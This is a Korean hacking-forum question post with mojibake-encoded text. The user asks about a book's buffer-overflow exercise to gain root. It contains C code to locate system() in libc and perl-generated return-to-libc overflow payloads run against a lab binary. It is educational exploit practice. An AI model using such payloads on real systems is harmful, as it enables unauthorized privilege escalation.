22019, 1/1101 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   dudgns0908
   ÇØÄðºÏ BOF ¿Õ±âÃÊÆí¿¡¼­ Áú¹®ÀÌ ÀÖ½À´Ï´Ù.

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Board&no=29651 [º¹»ç]


root ±ÇÇÑÀ» ȹµæÇÏ¶ó ¹®Á¦¿¡¼­ Áú¹®ÀÌ ÀÖ½À´Ï´Ù.

/bin/bash2

export PATH=$PATH:.

cat > addr_of_system.c
#include <dlfcn,f>

int main()
{
        long addr;
        void *handle;

        handle = dlopen("/lib/libc.so.6", RTLD_LAZY);
        addr = (long)dlsym(handle, "system");
        printf("system() is at 0x%x\n", addr);

}
// ÀÌ ÇÔ¼ö´Â ¸í·É¾îÀÚü¸¦ Àß ¸ð¸£°Ù³×¿ä..¤Ð¤Ð dlopen(), dlsym() << À̵Π¸í·É¾î Á» °¡¸£ÃÄÁÖ½Ã¸é °¨»çÇϰٽÀ´Ï´Ù.


gcc -o ./addr_of_system addr_of_system.c -lc -ldl

./vuln `perl -e 'printf"A"x84 . "\xe0\x8a\x05\x40"'`

./vuln `perl -e 'printf"A"x84 . "\xe0\x8a\x05\x40"'` 2> output  
// ¿©±â¼­ ´Ù¸¥°Ç ´Ù ÀÌÇØ°¡ °¡Áö¸¸ > ¿ÞÂÊ   ¿¡ 2´Â ¿Ö Àִ°ÅÁÒ?? ¾ø¾îµµ µÉ°Å°°Àºµ¥ ¸»ÀÌÁÒ..¤Ð¤Ð


xxd output

¹Ø¿¡ Äڵ尡 ´õ ÀÖ±äÇÏÁö¸¸ ÇÊ¿ä¾øÀ»°Å°°¾Æ »ý·«ÇÕ´Ï´Ù..
ÀÌ°Ç Ã¥ÀÇ ¸¶Áö¸·¿¡ ÀÖ´Â root ±ÇÇÑÀ» ¾ò¾î¶óÀÇ Á¤´äÀÇ ÀϺÎÀÔ´Ï´Ù.(°ÅÀÇ ´ÙÀ̱äÇÏÁö¸¸¿ä..¤¾)
³Ê¹« ±Ã±ÝÇØ¼­ ¿Ã·Áº¾´Ï´Ù..^^



  Hit : 10562     Date : 2012/11/16 06:20



    
69 http://blog.naver.com/PostView.nhn?blogId=darkwonderer&logNo=10100045648
±¸±Û¸µ ÇØº¸¼¼¿ä~
2012/11/16  
dudgns0908 °¨»çÇÕ´Ï´Ù! ¤¾¤¾ 2012/11/22  
     [°øÁö]ÇØÄ¿½ºÄð ÀÌ¿ë¼öÄ¢ 2021/04/11 ¼öÁ¤ÆÇ [54] ÇѽÂÀç 01/05 11603
22018   À¸¾Ó!!![1]     ÇØÅ·ÀßÇϰí½Í´Ù
02/05 35
22017   A¤¿...     ÇØÅ·ÀßÇϰí½Í´Ù
01/27 85
22016   ¿À·£¸¸~     DarkSlayer
12/11 270
22015   ÇØÄ¿½ºÄð ¿¾³¯ BGM[1]     wkfhddl4041
11/07 416
22014   È÷À×...     ÇØÅ·ÀßÇϰí½Í´Ù
11/02 337
22013   ¹ÙµÏ°ú Àå±â     ÇØÅ·ÀßÇϰí½Í´Ù
10/30 371
22012   ³ª´Â ¾ðÁ¦ ¾ÖÀÎÀÌ »ý±â³ª¿è...     ÇØÅ·ÀßÇϰí½Í´Ù
10/27 427
22011   Àü±¹ 1À§     ÇØÅ·ÀßÇϰí½Í´Ù
10/27 376
22010   ´ã¹è ¤»¤»[1]     ÇØÅ·ÀßÇϰí½Í´Ù
10/27 384
22009   ¸ÅÆ®¸¯½ºÀÇ ÆÄ¶õ¾àÀ» ¾Æ½Ê´Ï±î..?     ÇØÅ·ÀßÇϰí½Í´Ù
10/27 367
22008   ¤·¤·[1]     ÇØÅ·ÀßÇϰí½Í´Ù
10/20 357
22007   ¿ÉÄ¡ ÇÙ°¨Áö ÇÁ·Î±×·¥Á» ¸¸µé¾îÁÖ¼¼¿ä[1]     powerima
10/15 359
22006   ÇØÅ·ÆÀ¿ø ¸ðÁý[1]     koromoon
08/27 884
22005   °°ÀÌ ÇØÅ· ÆÀ ÀÌ·ç½ÇºÐ??     hacs98
08/26 572
22004   ¾Æ........ ¤Ð¤Ð     ÇØÅ·ÀßÇϰí½Í´Ù
08/04 728
22003   ±Í¼ö(Сâ¢) µû¶óÇϱâ(?)     ÇØÅ·ÀßÇϰí½Í´Ù
07/28 718
22002   ½º½º·Î ¸ñ¼ûÀ» Á®¹ö¸°´Ù´Â °ÍÀº     ÇØÅ·ÀßÇϰí½Í´Ù
07/27 748
22001   ¹ÌÄ£µí     ÇØÅ·ÀßÇϰí½Í´Ù
07/02 803
22000   »ç¹«½Ç     ÇØÅ·ÀßÇϰí½Í´Ù
07/02 740
1 [2][3][4][5][6][7][8][9][10]..[1101]

Copyright 1999-2026 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org